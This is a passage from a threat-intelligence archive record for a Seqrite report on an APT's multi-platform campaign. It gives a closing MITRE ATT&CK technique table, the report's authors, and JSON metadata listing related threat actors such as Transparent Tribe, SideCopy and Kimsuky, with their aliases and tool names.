Link\r\nExecution\r\nT1106\r\nT1129\r\nT1059\r\nT1047\r\nT1204.001\r\nT1204.002\r\nNative API\r\nShared Modules\r\nCommand and Scripting Interpreter\r\nWindows Management Instrumentation\r\nUser Execution: Malicious Link\r\nUser Execution: Malicious File\r\nPersistence\r\nT1053.003 Scheduled Task/Job: Cron\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 27 of 29\n\nT1547.001 Registry Run Keys / Startup Folder\r\nPrivilege Escalation\r\nT1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control\r\nDefense Evasion\r\nT1036.005\r\nT1036.007\r\nT1140\r\nT1218.005\r\nT1574.002\r\nT1027\r\nT1620\r\nMasquerading: Match Legitimate Name or Location\r\nMasquerading: Double File Extension\r\nDeobfuscate/Decode Files or Information\r\nSystem Binary Proxy Execution: Mshta\r\nHijack Execution Flow: DLL Side-Loading\r\nObfuscated Files or Information\r\nReflective Code Loading\r\nDiscovery\r\nT1012\r\nT1016\r\nT1033\r\nT1057\r\nT1082\r\nT1083\r\nT1518.001\r\nQuery Registry\r\nSystem Network Configuration Discovery\r\nSystem Owner/User Discovery\r\nProcess Discovery\r\nSystem Information Discovery\r\nFile and Directory Discovery\r\nSoftware Discovery: Security Software Discovery\r\nCollection\r\nT1005\r\nT1056.001\r\nT1123\r\nT1113\r\nT1560.001\r\nData from Local System\r\nInput Capture: Keylogging\r\nAudio Capture\r\nScreen Capture\r\nArchive Collected Data: Archive via Utility\r\nCommand and Control\r\nT1105\r\nT1571\r\nIngress Tool Transfer\r\nNon-Standard Port\r\nExfiltration\r\nT1041 Exfiltration Over C2 Channel\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 28 of 29\n\nAuthors:\r\nSathwik Ram Prakki\r\nKartikkumar Jivani\r\nSource: https://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/" ], "report_names": [ "goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "64a08f65-4ef8-4ad5-bac1-ce4e0fd2808c", "created_at": "2024-08-28T02:02:09.663698Z", "updated_at": "2026-04-10T02:00:04.927384Z", "deleted_at": null, "main_name": "TAG-100", "aliases": [ "Storm-2077" ], "source_name": "ETDA:TAG-100", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "CrossC2", "LESLIELOADER", "Pantegana", "SparkRAT", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "235831df-8daf-4a88-945e-db4e7ef06ac6", "created_at": "2023-11-17T02:00:07.606121Z", "updated_at": "2026-04-10T02:00:03.458263Z", "deleted_at": null, "main_name": "DragonSpark", "aliases": [], "source_name": "MISPGALAXY:DragonSpark", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0e9d99dc-01ad-49a5-8357-5f147d38559b", "created_at": "2024-09-20T02:00:04.587227Z", "updated_at": "2026-04-10T02:00:03.701875Z", "deleted_at": null, "main_name": "UAT-5394", "aliases": [], "source_name": "MISPGALAXY:UAT-5394", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "99aa0795-8936-45db-a397-6d01131fcdcd", "created_at": "2023-02-18T02:04:24.085379Z", "updated_at": "2026-04-10T02:00:04.654299Z", "deleted_at": null, "main_name": "DragonSpark", "aliases": [], "source_name": "ETDA:DragonSpark", "tools": [ "BadPotato", "CHINACHOPPER", "China Chopper", "GotoHTTP", "SharpToken", "SinoChopper", "SparkRAT" ], "source_id": "ETDA", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "db5b833a-965e-4f46-b75d-7e829466a5fa", "created_at": "2024-12-21T02:00:02.843374Z", "updated_at": "2026-04-10T02:00:03.780907Z", "deleted_at": null, "main_name": "Storm-2077", "aliases": [ "TAG-100", "RedNovember" ], "source_name": "MISPGALAXY:Storm-2077", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434249, "ts_updated_at": 1775792261, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4bf5f63f9ac5ee363cccdecd9541e313fe8d962c.pdf", "text": "https://archive.orkl.eu/4bf5f63f9ac5ee363cccdecd9541e313fe8d962c.txt", "img": "https://archive.orkl.eu/4bf5f63f9ac5ee363cccdecd9541e313fe8d962c.jpg" } }